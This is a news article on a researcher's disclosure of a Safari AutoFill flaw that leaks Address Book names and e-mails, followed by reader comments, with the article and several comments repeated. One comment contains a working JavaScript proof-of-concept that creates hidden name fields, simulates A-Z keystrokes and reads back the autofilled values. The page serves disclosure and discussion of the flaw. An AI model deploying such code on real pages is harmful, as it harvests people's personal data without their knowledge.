Security researcher demos autofill exploit in Apple Safari
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.
Jeremiah Grossman revealed on his blog this week that users who have the "AutoFill web forms" feature enabled on Safari versions 4 and 5 is vulnerable to malicious code. The AutoFill feature is enabled by default in Apple's Web browser.
The feature automatically fills online text forms that have specific, common names, such as "name," "company," "city," "state," "e-mail," and more. The information is automatically grabbed from the user's personal record included in the operating systems' address book. That means the information could be obtained without the user even entering it into the Safari browser.
"All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript," Grossman wrote. "When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker."
He also created a proof-of-concept to show how it takes "mere seconds" to obtain the personal information. Grossman said the data could be used to send e-mail spam or conduct a phishing attack.
"Fortunately any AutoFill data starting with a number, such as phone numbers or street addresses, could not be obtained because for some reason the data would not populate in the text field," he said. "Still, such attacks could be easily and cheaply distributed on a mass scale using an advertising network where likely no one would ever notice because it's not exploit code designed to deliver rootkit payload."
Safari 5, the latest version of Apple's Web browser, was released in June. It added extensions and expanded HTML5 support for the desktop software.
Jeremiah Grossman revealed on his blog this week that users who have the "AutoFill web forms" feature enabled on Safari versions 4 and 5 is vulnerable to malicious code. The AutoFill feature is enabled by default in Apple's Web browser.
The feature automatically fills online text forms that have specific, common names, such as "name," "company," "city," "state," "e-mail," and more. The information is automatically grabbed from the user's personal record included in the operating systems' address book. That means the information could be obtained without the user even entering it into the Safari browser.
"All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript," Grossman wrote. "When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker."
He also created a proof-of-concept to show how it takes "mere seconds" to obtain the personal information. Grossman said the data could be used to send e-mail spam or conduct a phishing attack.
"Fortunately any AutoFill data starting with a number, such as phone numbers or street addresses, could not be obtained because for some reason the data would not populate in the text field," he said. "Still, such attacks could be easily and cheaply distributed on a mass scale using an advertising network where likely no one would ever notice because it's not exploit code designed to deliver rootkit payload."
Safari 5, the latest version of Apple's Web browser, was released in June. It added extensions and expanded HTML5 support for the desktop software.
Comments
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.
Yikes that is a bad one. I unchecked it right now.
It would take about 30 seconds of so to find out your name, email, address, which means a video site or a long article site would be the best place for this to wok.
I will be interested to hear the Apple response to this. I find it almost too obvious to be plausible. What malicious code has been proven to access this so far? I did disable it though
Yep. Javascript and Ajax, the savior of the of the web.
I just tested the fields that have numbers. When you start the phone with a "(" it does give you a drop down list presumably using Javascript. So if you could figure out the innerHTML being used, one might be able to get that info as well. Same thing with the address field. You get a drop down select list.
I have to do some more testing. I'm curious whether SSL prevents it, but signed certificates would at least be more trustworthy.
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered. ...
I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.
*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,
That web site can get your name and address. Wow.
I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...
... the phone book in every public telephone in my home town.
function start() {
\tvar str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
\tvar charset = str.split("");\t
\tvar d = document.getElementById('data');
\tvar f = [];
\tvar i = [];
\t//var char = charset.shift();
\tfor(var xx = 0; xx < 26; xx++){
\t\tf[xx] = document.createElement('form');
\t\tf[xx].id = 'form'+xx;
\t\ti[xx] = document.createElement('input');
\t\ti[xx].type = "text";
\t\ti[xx].name = 'name';
\t\ti[xx].id = "iname"+xx;
\t\tf[xx].appendChild(i[xx]);
\t\tdocument.getElementById('hack').appendChild(f[xx]);
\t\tvar event = document.createEvent('TextEvent');
\t\tevent.initTextEvent('textInput', true, true, null, charset[xx]);
\t
\t\ti[xx].value = "";
\t\ti[xx].selectionStart = 0;
\t\ti[xx].selectionEnd = 0;
\t\ti[xx].focus();
\t\ti[xx].dispatchEvent(event);\t
\t}
\t
\tsetTimeout(function() {
\t\tfor(var xx = 0; xx < 26; xx++){
\t\t\tvar i = document.getElementById('iname'+xx);
\t\t\tif (i.value.length > 1) {
\t\t\t\td.innerHTML += i.value + "<br>\
";
\t\t\t}
\t\t}
\t}, 500);
}
I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.
*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,
That web site can get your name and address. Wow.
I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...
... the phone book in every public telephone in my home town.
If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Never the less, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.
If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Never the less, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.
Agreed that it's a security flaw.
It's just a small, weird, kind of silly security flaw IMO.
But all over the web today there are scary stories about this "awful" "dangerous" flaw. Ars is actually running with a headline that says "Apple the new world leader in software insecurity." Which is absolutely ridiculous in it's implications.
As with Antennagate, the media is having fun making it seem like Apple is evil incarnate etc.
I think we'll see a quick security patch here. I guess a LOT of people are using Auto Fill..
It does take a little bit to get it configured, but guess what, ssshhhhh ... <whispering>NoScript can also kill all the 3rd party analytic Javascript running on your browsing sessions.
If you can't get click-jacked, almost all the web malware gets cut out except for the crap like giving out your password to load video codecs...
If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting.
It is many years since I get unsolicited telemarketing on my home phone line, personally addressed to me. It is very annoying and has obviously nothing to do with such vulnerabilities in web browsers. Companies have other and more sure means to collect personal information, with the most obvious being the telephone directory. That one is not going to disappear auto-magically after a security update.
Never the less, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.
Here I agree but I don't see much potential for harm. Hopefully it will be trivial for Apple to close the hole.